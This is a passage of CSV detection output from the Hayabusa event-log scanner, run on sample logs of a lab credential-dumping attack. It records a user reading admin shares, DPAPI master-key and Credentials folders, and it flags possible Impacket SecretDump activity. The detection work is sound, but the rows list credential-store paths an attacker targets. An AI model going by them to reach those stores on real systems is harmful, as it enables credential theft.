Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.658 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.658 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.658 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.658 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 
+2021-12-12 07:16:05.674 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.674 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.674 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.674 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.674 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.674 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.674 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.689 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.689 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.689 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | 
admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\oyCCGQai.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:08.857 +00:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.310 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\AqdQWnLE.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.310 +00:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.601 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.617 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.617 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.617 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\1d0d5e15-3dd4-4689-a6c8-b3f4a523f317 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.632 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\4940c1c2-798b-4291-9cbf-56ba1bc56acd | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.648 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\dd10a8dd-2e01-4512-9e4e-0ab8b174b115 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.663 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.663 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.663 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.680 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.685 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.685 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234\eca8ffbf-fcd6-4e81-a424-36116606541f | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.701 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.701 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.716 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network 
share.evtx +2021-12-12 11:53:11.716 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\084aa96d-4fd0-4004-802f-dad10353ce8b | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.732 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\0f51cf18-7e42-4905-a5e2-4dcd2016ba02 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.748 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\48f8844f-6a0e-44cc-b4c9-4b6aeb83bdcd | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.748 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\5dd255ba-fb23-45a9-8f1c-3efe30e43a08 | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.763 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\7ac45d37-fa59-41b4-a80a-cb9224e97518 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.779 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\85b74294-ac3a-4166-8db9-0eb9596ae80e | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.779 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\cbd1402e-96f2-4c55-a4b3-990c71387659 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.794 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\e1d47273-0077-4091-9c01-88df1f2b8983 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.810 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.810 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\0d670005-17c4-4245-8305-54f955fcb04a | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.826 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\521f9c27-57b0-4cbb-bba2-5155c9b3fdbd | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.841 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\afe30aef-f67e-4cea-9b91-71318f566140 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.857 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\fd60f910-8888-473c-b62a-b304e884cfef | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.857 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\ff8d1c3a-73ac-4d33-b09f-51dcf8ae55ef | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.874 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.874 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\76515ee5-f236-486e-ba36-3ac0ee10be88 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.889 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\9482b28c-116d-4469-a3ed-46d2902c2d4b | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.905 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\afb26c33-05ad-49ff-a854-61607af4edfc | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.920 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.920 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.920 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.938 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.940 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.940 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 